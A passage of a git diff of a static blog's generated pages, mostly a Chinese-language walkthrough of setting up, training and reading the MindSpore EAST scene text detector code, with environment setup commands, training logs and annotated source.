    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    import cv2
    import os
    import matplotlib.pyplot as plt

    index = 1200

    image_dir = r'E:\dataset\CTW1500\ctw1500\test_images\\'
    label_dir = r'E:\dataset\CTW1500\ctw1500\gt_ctw1500\\'

    image_path = os.path.join(image_dir, "{:04d}".format(index) + '.jpg')
    label_path = os.path.join(label_dir, "{:07d}".format(index) + '.txt')

    image_origin = cv2.imread(image_path)
    image = image_origin.copy()
    height, width, _ = image.shape
    label_file = open(label_path, 'r')
    annotations = label_file.readlines()
    label_file.close()

    for annotation in annotations:
    coords_text = annotation.strip().split(',####')
    coords = list(map(int, coords_text[0].split(',')))
    points = np.array([(coords[i], coords[i+1]) for i in range(0, len(coords), 2)])
    transcriptions = coords_text[1]

    cv2.polylines(image, [points], isClosed=True, color=(255, 0, 0), thickness=2)

    for p in points:
    cv2.circle(image, (p[0], p[1]), int(min(height, width) / 150), (0, 255, 255), -1)

    cv2.putText(image, transcriptions, (points[0][0], points[0][1] - int(min(height, width) / 150)), cv2.FONT_HERSHEY_SIMPLEX,
    min(height, width) / 1000, (0, 255, 0), int(min(height, width) / 500))

    fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(16, 9))
    axes = axes.flatten()

    axes[0].imshow(cv2.cvtColor(image_origin, cv2.COLOR_BGR2RGB))
    axes[0].axis('off')
    axes[0].set_title('Origin')

    axes[1].imshow(cv2.cvtColor(image, cv2.COLOR_BGR2RGB))
    axes[1].axis('off')
    axes[1].set_title('Annotation')

    plt.tight_layout()
    plt.show()

    png

    @@ -703,6 +701,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Domain Adaptation-A Survey/index.html b/posts/Paper-Domain Adaptation-A Survey/index.html index 19e7b796b4..67be892e10 100644 --- a/posts/Paper-Domain Adaptation-A Survey/index.html +++ b/posts/Paper-Domain Adaptation-A Survey/index.html @@ -44,8 +44,6 @@ - - @@ -4373,6 +4371,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Dual-Dimensional Adversarial Attacks-A Novel Spatial and Temporal Attack Strategy for Multi-Object Tracking/index.html b/posts/Paper-Dual-Dimensional Adversarial Attacks-A Novel Spatial and Temporal Attack Strategy for Multi-Object Tracking/index.html index 192c269ebd..252f562e51 100644 --- a/posts/Paper-Dual-Dimensional Adversarial Attacks-A Novel Spatial and Temporal Attack Strategy for Multi-Object Tracking/index.html +++ b/posts/Paper-Dual-Dimensional Adversarial Attacks-A Novel Spatial and Temporal Attack Strategy for Multi-Object Tracking/index.html @@ -44,8 +44,6 @@ - - @@ -629,6 +627,8 @@

    目录

    var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-EAST-An Efficient and Accurate Scene Text Detector/index.html b/posts/Paper-EAST-An Efficient and Accurate Scene Text Detector/index.html index 8d621082d4..777e4dd731 100644 --- a/posts/Paper-EAST-An Efficient and Accurate Scene Text Detector/index.html +++ b/posts/Paper-EAST-An Efficient and Accurate Scene Text Detector/index.html @@ -44,8 +44,6 @@ - - @@ -626,25 +624,25 @@

    Windows

    WSL2

    装好环境

    -
    conda create -n EAST python=3.7
    conda activate EAST
    pip install shapely
    pip install opencv-python==4.0.0.21
    pip install lanms-proper
    +
    1
    2
    3
    4
    5
    conda create -n EAST python=3.7
    conda activate EAST
    pip install shapely
    pip install opencv-python==4.0.0.21
    pip install lanms-proper

    开跑!

    -
    python3 train.py
    +
    1
    python3 train.py

    喜提错误:

    -
      File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
    from .cv2 import *
    ImportError: libSM.so.6: cannot open shared object file: No such file or directory
    +
    1
    2
    3
      File "/home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/cv2/__init__.py", line 3, in <module>
    from .cv2 import *
    ImportError: libSM.so.6: cannot open shared object file: No such file or directory

    填:

    -
    sudo apt update
    sudo apt install libsm6
    +
    1
    2
    sudo apt update
    sudo apt install libsm6

    喜提错误:

    -
    Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
    Please make sure libcudnn_cnn_infer.so.8 is in your library path!
    +
    1
    2
    Could not load library libcudnn_cnn_infer.so.8. Error: libcuda.so: cannot open shared object file: No such file or directory
    Please make sure libcudnn_cnn_infer.so.8 is in your library path!

    安装 CUDNN:

    -
    sudo apt install nvidia-cuda-toolkit
    +
    1
    sudo apt install nvidia-cuda-toolkit

    开跑!

    -
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/torch/optim/lr_scheduler.py:143: UserWarning: Detected call of `lr_scheduler.step()` before `optimizer.step()`. In PyTorch 1.1.0 and later, you should call them in the opposite order: `optimizer.step()` before `lr_scheduler.step()`.  Failure to do this will result in PyTorch skipping the first value of the learning rate schedule. See more details at https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate
    "https://pytorch.org/docs/stable/optim.html#how-to-adjust-learning-rate", UserWarning)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    /home/gz/anaconda3/envs/EAST/lib/python3.7/site-packages/shapely/set_operations.py:133: RuntimeWarning: invalid value encountered in intersection
    return lib.intersection(a, b, **kwargs)
    classify loss is 0.98071122, angle loss is 0.68633509, iou loss is 5.08373260
    Epoch is [1/600], mini-batch is [1/250], time consumption is 8.06183171, batch_loss is 12.92779446
    classify loss is 0.99145019, angle loss is 0.75015461, iou loss is 4.81786251
    Epoch is [1/600], mini-batch is [2/250], time consumption is 0.21901011, batch_loss is 13.31085873
    classify loss is 0.99974638, angle loss is 0.74429435, iou loss is 5.48675823
    Epoch is [1/600], mini-batch is [3/250], time consumption is 0.21214652, batch_loss is 13.92944813
    classify loss is 0.99397326, angle loss is 0.60727608, iou loss is 3.27876091
    Epoch is [1/600], mini-batch is [4/250], time consumption is 0.22212124, batch_loss is 10.34549522
    classify loss is 0.99331516, angle loss is 0.67070889, iou loss is 3.67775035
    Epoch is [1/600], mini-batch is [5/250], time consumption is 0.23853326, batch_loss is 11.37815380
    classify loss is 0.98511696, angle loss is 0.73328424, iou loss is 3.17167139
    Epoch is [1/600], mini-batch is [6/250], time consumption is 0.20371103, batch_loss is 11.48963070
    classify loss is 0.99793059, angle loss is 0.60213274, iou loss is 4.67736626
    ...

    MindSpore

    读代码

    train.py

    好像跟其他的train.py差不多,设置完各种参数然后加载模型和优化器,开跑!

    各种细节都在src/里。

    -
    from src.util import AverageMeter, get_param_groups
    from src.east import EAST, EastWithLossCell
    from src.logger import get_logger
    from src.initializer import default_recurisive_init
    from src.dataset import create_east_dataset
    from src.lr_scheduler import get_lr
    +
    1
    2
    3
    4
    5
    6
    from src.util import AverageMeter, get_param_groups
    from src.east import EAST, EastWithLossCell
    from src.logger import get_logger
    from src.initializer import default_recurisive_init
    from src.dataset import create_east_dataset
    from src.lr_scheduler import get_lr

    这段代码主要是对所需的模块进行引用,包括平均数计算、网络参数获取、EAST 模型、损失函数、日志记录、参数初始化、EAST 数据集和学习率调度器。

    首先,从src.util模块中引入AverageMeter()get_param_groups()方法,分别用于计算平均数和获取网络中需要训练的参数。

    @@ -966,7 +964,7 @@
    Parser 变
    分布式计算

    这段代码主要是设置 Mindspore 的分布式计算的参数,我并不想动它。

    -
    args, _ = parser.parse_known_args()
    args.device_id = int(os.getenv("DEVICE_ID", "0"))
    args.rank = args.device_id

    ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
    if args.is_distributed:
    comm.init()
    args.rank = comm.get_rank()
    args.group_size = comm.get_group_size()
    ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
    device_num=args.group_size)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    args, _ = parser.parse_known_args()
    args.device_id = int(os.getenv("DEVICE_ID", "0"))
    args.rank = args.device_id

    ms.set_context(mode=ms.GRAPH_MODE, device_target=args.device_target, device_id=args.device_id)
    if args.is_distributed:
    comm.init()
    args.rank = comm.get_rank()
    args.group_size = comm.get_group_size()
    ms.set_auto_parallel_context(parallel_mode=ms.ParallelMode.DATA_PARALLEL, gradients_mean=True,
    device_num=args.group_size)

    ModelArts

    ModelArts 相关的参数,但是我把它设为 0 依然能跑?

    @@ -978,26 +976,26 @@
    ModelArts

    接下来,使用mox.file.copy_parallel()方法将数据从远程路径(即args.data_dir)拷贝到本地数据路径。

    最后,将输出路径(即args.outputs_dir)设置为/cache目录下的子目录。在ModelArts平台上运行程序时,程序的输出也需要放在/cache目录下,以保证数据的持久化存储。

    -
    if args.is_modelArts:
    import moxing as mox

    local_data_url = os.path.join('/cache/data', str(args.rank))
    local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
    local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

    mox.file.rename(args.pretrained_backbone, local_ckpt_url)
    args.pretrained_backbone = local_ckpt_url

    mox.file.copy_parallel(args.data_dir, local_data_url)
    args.data_dir = local_data_url

    args.outputs_dir = os.path.join('/cache', args.outputs_dir)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    if args.is_modelArts:
    import moxing as mox

    local_data_url = os.path.join('/cache/data', str(args.rank))
    local_ckpt_url = os.path.join('/cache/ckpt', str(args.rank))
    local_ckpt_url = os.path.join(local_ckpt_url, 'backbone.ckpt')

    mox.file.rename(args.pretrained_backbone, local_ckpt_url)
    args.pretrained_backbone = local_ckpt_url

    mox.file.copy_parallel(args.data_dir, local_data_url)
    args.data_dir = local_data_url

    args.outputs_dir = os.path.join('/cache', args.outputs_dir)

    相关路径

    设置相关路径(数据集、日志):

    -
    args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
    args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

    # 使用当前进程的编号(即 args.rank 变量)作为子目录名称,拼接成完整的输出文件夹路径
    outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
    # 获取当前时间作为子目录名称,再次拼接成完整的输出文件夹路径
    args.outputs_dir = os.path.join(
    args.outputs_dir,
    datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
    args.logger = get_logger(args.outputs_dir, args.rank) # 调用 get_logger()函数创建一个日志记录器,并将日志保存在 args.outputs_dir 目录下
    args.logger.save_args(args) # 将所有参数保存在日志文件中
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    args.data_root = os.path.abspath(os.path.join(args.data_dir, 'image'))
    args.txt_root = os.path.abspath(os.path.join(args.data_dir, 'groundTruth'))

    # 使用当前进程的编号(即 args.rank 变量)作为子目录名称,拼接成完整的输出文件夹路径
    outputs_dir = os.path.join(args.outputs_dir, str(args.rank))
    # 获取当前时间作为子目录名称,再次拼接成完整的输出文件夹路径
    args.outputs_dir = os.path.join(
    args.outputs_dir,
    datetime.datetime.now().strftime('%Y-%m-%d_time_%H_%M_%S'))
    args.logger = get_logger(args.outputs_dir, args.rank) # 调用 get_logger()函数创建一个日志记录器,并将日志保存在 args.outputs_dir 目录下
    args.logger.save_args(args) # 将所有参数保存在日志文件中

    if __name__ == "__main__":

    优化

    进行代码加速优化

    -
    if args.need_profiler:
    # 创建一个性能分析器,并将结果保存在args.outputs_dir路径下
    profiler = Profiler(
    output_path=args.outputs_dir,
    is_detail=True,
    is_show_op_path=True)

    # 创建一个AverageMeter对象用于记录损失值的平均值,以便后续输出和打印
    loss_meter = AverageMeter('loss')

    # 重置自动并行上下文
    context.reset_auto_parallel_context()
    parallel_mode = ParallelMode.STAND_ALONE
    degree = 1
    # 又是分布式计算相关……
    if args.is_distributed:
    parallel_mode = ParallelMode.DATA_PARALLEL
    degree = args.group_size
    context.set_auto_parallel_context(
    parallel_mode=parallel_mode,
    gradients_mean=True,
    device_num=degree)
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    if args.need_profiler:
    # 创建一个性能分析器,并将结果保存在args.outputs_dir路径下
    profiler = Profiler(
    output_path=args.outputs_dir,
    is_detail=True,
    is_show_op_path=True)

    # 创建一个AverageMeter对象用于记录损失值的平均值,以便后续输出和打印
    loss_meter = AverageMeter('loss')

    # 重置自动并行上下文
    context.reset_auto_parallel_context()
    parallel_mode = ParallelMode.STAND_ALONE
    degree = 1
    # 又是分布式计算相关……
    if args.is_distributed:
    parallel_mode = ParallelMode.DATA_PARALLEL
    degree = args.group_size
    context.set_auto_parallel_context(
    parallel_mode=parallel_mode,
    gradients_mean=True,
    device_num=degree)

    加载模型
    -
    network = EAST()  # 设置 network,加载 EAST 模型
    # default is kaiming-normal
    default_recurisive_init(network) # 对 EAST 模型进行默认的递归初始化。这里使用的是 kaiming-normal(He 正态分布)初始化方法

    # load pretrained_backbone
    if args.pretrained_backbone: # 如果不为 None,载入预训练的 backbone 模型
    parm_dict = load_checkpoint(args.pretrained_backbone) # 加载模型参数
    load_param_into_net(network, parm_dict) # 将模型参数加载到 network 上
    args.logger.info('finish load pretrained_backbone') # 在日志中记录加载完成的信息

    network = EastWithLossCell(network) # 将 EAST 模型和损失函数进行结合,即将模型传入 EastWithLossCell()函数,得到组合后的模型对象
    if args.resume_east: # 如果 args.resume_east 不为 None,继续训练之前保存的 EAST 模型,resume:恢复,继续
    param_dict = load_checkpoint(args.resume_east)
    load_param_into_net(network, param_dict)
    args.logger.info('finish get resume east')

    args.logger.info('finish get network')

    # 载入数据集,调用 create_east_dataset()函数,传入图片文件夹路径、文本文件夹路径、批量大小、设备数量、进程编号等参数,获取数据集以及数据总数,并在日志中记录加载完成的信息。
    ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
    device_num=args.group_size, rank=args.rank, is_training=True)
    args.logger.info('Finish loading dataset')

    # 计算每个 epoch 中的步数,即将数据总数、批量大小和设备数量进行计算得到
    args.steps_per_epoch = int(
    data_size /
    args.per_batch_size /
    args.group_size)

    if not args.ckpt_interval:
    # 如果 args.ckpt_interval 为空,则将其设置为每个 epoch 的步数
    args.ckpt_interval = args.steps_per_epoch
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    network = EAST()  # 设置 network,加载 EAST 模型
    # default is kaiming-normal
    default_recurisive_init(network) # 对 EAST 模型进行默认的递归初始化。这里使用的是 kaiming-normal(He 正态分布)初始化方法

    # load pretrained_backbone
    if args.pretrained_backbone: # 如果不为 None,载入预训练的 backbone 模型
    parm_dict = load_checkpoint(args.pretrained_backbone) # 加载模型参数
    load_param_into_net(network, parm_dict) # 将模型参数加载到 network 上
    args.logger.info('finish load pretrained_backbone') # 在日志中记录加载完成的信息

    network = EastWithLossCell(network) # 将 EAST 模型和损失函数进行结合,即将模型传入 EastWithLossCell()函数,得到组合后的模型对象
    if args.resume_east: # 如果 args.resume_east 不为 None,继续训练之前保存的 EAST 模型,resume:恢复,继续
    param_dict = load_checkpoint(args.resume_east)
    load_param_into_net(network, param_dict)
    args.logger.info('finish get resume east')

    args.logger.info('finish get network')

    # 载入数据集,调用 create_east_dataset()函数,传入图片文件夹路径、文本文件夹路径、批量大小、设备数量、进程编号等参数,获取数据集以及数据总数,并在日志中记录加载完成的信息。
    ds, data_size = create_east_dataset(img_root=args.data_root, txt_root=args.txt_root, batch_size=args.per_batch_size,
    device_num=args.group_size, rank=args.rank, is_training=True)
    args.logger.info('Finish loading dataset')

    # 计算每个 epoch 中的步数,即将数据总数、批量大小和设备数量进行计算得到
    args.steps_per_epoch = int(
    data_size /
    args.per_batch_size /
    args.group_size)

    if not args.ckpt_interval:
    # 如果 args.ckpt_interval 为空,则将其设置为每个 epoch 的步数
    args.ckpt_interval = args.steps_per_epoch

    设置优化器
    -
    # get learnning rate
    lr = get_lr(args) # 函数获取当前epoch的学习率,并将其赋值给变量lr
    opt = Adam( # 使用Adam优化器进行优化,并指定优化器的参数为EAST模型中需要更新的参数
    params=get_param_groups(network),
    learning_rate=Tensor(
    lr,
    ms.float32))
    loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True) # 固定的损失缩放管理器
    model = Model(network, optimizer=opt, loss_scale_manager=loss_scale) # 使用Model函数从EAST模型对象和优化器拼接出一个完整的训练模型,并将损失缩放管理器传入
    # 这样就生成了完整的训练模型对象,并且可以对其进行训练
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    # get learnning rate
    lr = get_lr(args) # 函数获取当前epoch的学习率,并将其赋值给变量lr
    opt = Adam( # 使用Adam优化器进行优化,并指定优化器的参数为EAST模型中需要更新的参数
    params=get_param_groups(network),
    learning_rate=Tensor(
    lr,
    ms.float32))
    loss_scale = FixedLossScaleManager(1.0, drop_overflow_update=True) # 固定的损失缩放管理器
    model = Model(network, optimizer=opt, loss_scale_manager=loss_scale) # 使用Model函数从EAST模型对象和优化器拼接出一个完整的训练模型,并将损失缩放管理器传入
    # 这样就生成了完整的训练模型对象,并且可以对其进行训练

    训练

    开始训练

    -
    network.set_train()  # 将网络设置为训练状态
    # save the network model and parameters for subsequence fine-tuning
    # 设置保存检查点的配置信息,包括保存检查点的步数和最大保存数量,并将其赋值给变量 config_ck
    config_ck = CheckpointConfig(
    save_checkpoint_steps=100,
    keep_checkpoint_max=1)
    # group layers into an object with training and evaluation features
    # 指定模型参数保存路径
    save_ckpt_path = os.path.join(
    args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
    # 使用 ModelCheckpoint()函数创建一个回调函数,用于保存训练模型参数
    ckpoint_cb = ModelCheckpoint(
    prefix="checkpoint_east",
    directory=save_ckpt_path,
    config=config_ck)
    # 创建一个回调函数,用于保存训练模型参数。其中,prefix 参数指定保存文件名的前缀,directory 参数指定保存路径,config 参数指定保存配置信息。
    callback = [
    TimeMonitor(data_size=data_size),
    LossMonitor(),
    ckpoint_cb
    ]
    # 调用 model.train()方法对训练模型进行训练,传入总 epoch 数、数据集以及之前定义的回调函数列表。在训练过程中,启用了数据集下沉模式,即 dataset_sink_mode=True,以提高训练效率
    model.train(
    args.max_epoch,
    ds,
    callbacks=callback,
    dataset_sink_mode=True)
    args.logger.info('==========end training===============')
    +
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    network.set_train()  # 将网络设置为训练状态
    # save the network model and parameters for subsequence fine-tuning
    # 设置保存检查点的配置信息,包括保存检查点的步数和最大保存数量,并将其赋值给变量 config_ck
    config_ck = CheckpointConfig(
    save_checkpoint_steps=100,
    keep_checkpoint_max=1)
    # group layers into an object with training and evaluation features
    # 指定模型参数保存路径
    save_ckpt_path = os.path.join(
    args.outputs_dir, 'ckpt_' + str(args.rank) + '/')
    # 使用 ModelCheckpoint()函数创建一个回调函数,用于保存训练模型参数
    ckpoint_cb = ModelCheckpoint(
    prefix="checkpoint_east",
    directory=save_ckpt_path,
    config=config_ck)
    # 创建一个回调函数,用于保存训练模型参数。其中,prefix 参数指定保存文件名的前缀,directory 参数指定保存路径,config 参数指定保存配置信息。
    callback = [
    TimeMonitor(data_size=data_size),
    LossMonitor(),
    ckpoint_cb
    ]
    # 调用 model.train()方法对训练模型进行训练,传入总 epoch 数、数据集以及之前定义的回调函数列表。在训练过程中,启用了数据集下沉模式,即 dataset_sink_mode=True,以提高训练效率
    model.train(
    args.max_epoch,
    ds,
    callbacks=callback,
    dataset_sink_mode=True)
    args.logger.info('==========end training===============')

    src/util.py

    定义了一些工具人类和函数,看不懂 orz:

      @@ -1009,7 +1007,7 @@

      src/util.py

      src/east.py

      class EAST

      定义了一个 EAST 网络的类 EAST

      -
      class EAST(nn.Cell):
      def __init__(self):
      super(EAST, self).__init__()
      # 提取图像特征的模块,返回 5 组特征图用于后续处理
      self.extractor = VGG16FeatureExtraction()
      # 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
      self.merge = Merge()
      # 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数 score 和几何信息预测值 geo
      self.output = Output()

      def construct(self, x_1):
      # 通过 x_1 输入数据调用 self.extractor()获取 5 组特征图
      f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
      # 将这些特征图传入 self.merge()模块进行拼接,得到拼接后的特征图
      x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
      # 将该特征图输入到 self.output()模块获得文本区域预测分数 score 和几何信息预测值 geo
      score, geo = self.output(x_1)

      return score, geo
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      class EAST(nn.Cell):
      def __init__(self):
      super(EAST, self).__init__()
      # 提取图像特征的模块,返回 5 组特征图用于后续处理
      self.extractor = VGG16FeatureExtraction()
      # 将特征图组合的模块,将 5 组特征图拼接在一起,形成更为丰富多样的特征信息用于后续处理
      self.merge = Merge()
      # 输出模块,对拼接后的特征图进行卷积处理来得到文本区域预测分数 score 和几何信息预测值 geo
      self.output = Output()

      def construct(self, x_1):
      # 通过 x_1 输入数据调用 self.extractor()获取 5 组特征图
      f_0, f_1, f_2, f_3, f_4 = self.extractor(x_1)
      # 将这些特征图传入 self.merge()模块进行拼接,得到拼接后的特征图
      x_1 = self.merge(f_0, f_1, f_2, f_3, f_4)
      # 将该特征图输入到 self.output()模块获得文本区域预测分数 score 和几何信息预测值 geo
      score, geo = self.output(x_1)

      return score, geo

      png

      代码对应的就是论文里的三个部分了:

        @@ -1032,7 +1030,7 @@
        class EAST

        class VGG16FeatureExtraction

        大致就是定义了一堆卷积核,然后按照论文里的方式一阵卷,返回 5 组特征图,但是特征图的标号好像跟论文里是反着来的。

        -
        class VGG16FeatureExtraction(nn.Cell):
        """VGG16FeatureExtraction for deeptext"""

        def __init__(self):
        super(VGG16FeatureExtraction, self).__init__()
        self.relu = nn.ReLU()
        self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
        self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

        self.conv1_1 = _conv(
        in_channels=3,
        out_channels=64,
        kernel_size=3,
        padding=1)

        ……

        self.conv5_3 = _conv(
        in_channels=512,
        out_channels=512,
        kernel_size=3,
        padding=1)
        self.cast = P.Cast()

        def construct(self, out):
        """ Construction of VGG """
        f_0 = out
        out = self.cast(out, mstype.float32)
        out = self.conv1_1(out)
        out = self.relu(out)
        out = self.conv1_2(out)
        out = self.relu(out)
        out = self.max_pool(out)

        ……

        out = self.max_pool(out)
        f_4 = out
        out = self.conv5_1(out)
        out = self.relu(out)
        out = self.conv5_2(out)
        out = self.relu(out)
        out = self.conv5_3(out)
        out = self.relu(out)
        out = self.max_pool(out)
        f_5 = out

        return f_0, f_2, f_3, f_4, f_5
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        class VGG16FeatureExtraction(nn.Cell):
        """VGG16FeatureExtraction for deeptext"""

        def __init__(self):
        super(VGG16FeatureExtraction, self).__init__()
        self.relu = nn.ReLU()
        self.max_pool = nn.MaxPool2d(kernel_size=2, stride=2)
        self.avg_pool = nn.AvgPool2d(kernel_size=2, stride=2)

        self.conv1_1 = _conv(
        in_channels=3,
        out_channels=64,
        kernel_size=3,
        padding=1)

        ……

        self.conv5_3 = _conv(
        in_channels=512,
        out_channels=512,
        kernel_size=3,
        padding=1)
        self.cast = P.Cast()

        def construct(self, out):
        """ Construction of VGG """
        f_0 = out
        out = self.cast(out, mstype.float32)
        out = self.conv1_1(out)
        out = self.relu(out)
        out = self.conv1_2(out)
        out = self.relu(out)
        out = self.max_pool(out)

        ……

        out = self.max_pool(out)
        f_4 = out
        out = self.conv5_1(out)
        out = self.relu(out)
        out = self.conv5_2(out)
        out = self.relu(out)
        out = self.conv5_3(out)
        out = self.relu(out)
        out = self.max_pool(out)
        f_5 = out

        return f_0, f_2, f_3, f_4, f_5

        class Merge
        @@ -1045,10 +1043,10 @@
        class Merge
      • nn.BatchNorm2d(128):是 MindSpore 中的一个二维批归一化函数,用于对网络模型中的卷积层或全连接层的输出进行归一化处理,以便更好地协调不同神经元之间的协同工作。
      • relu():激活函数
      -
      class Merge(nn.Cell):
      def __init__(self):
      super(Merge, self).__init__()

      self.conv1 = nn.Conv2d(1024, 128, 1, has_bias=True)
      self.bn1 = nn.BatchNorm2d(128)
      self.relu1 = nn.ReLU()
      self.conv2 = nn.Conv2d(
      128,
      128,
      3,
      padding=1,
      pad_mode='pad',
      has_bias=True)
      self.bn2 = nn.BatchNorm2d(128)
      self.relu2 = nn.ReLU()

      ……

      def construct(self, x, f1, f2, f3, f4):
      img_hight = P.Shape()(x)[2]
      img_width = P.Shape()(x)[3]

      out = P.ResizeBilinear((img_hight / 16, img_width / 16), True)(f4)
      out = self.concat((out, f3))
      out = self.relu1(self.bn1(self.conv1(out)))
      out = self.relu2(self.bn2(self.conv2(out)))

      out = P.ResizeBilinear((img_hight / 8, img_width / 8), True)(out)
      out = self.concat((out, f2))
      out = self.relu3(self.bn3(self.conv3(out)))
      out = self.relu4(self.bn4(self.conv4(out)))

      out = P.ResizeBilinear((img_hight / 4, img_width / 4), True)(out)
      out = self.concat((out, f1))
      out = self.relu5(self.bn5(self.conv5(out)))
      out = self.relu6(self.bn6(self.conv6(out)))

      out = self.relu7(self.bn7(self.conv7(out)))
      return out
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      class Merge(nn.Cell):
      def __init__(self):
      super(Merge, self).__init__()

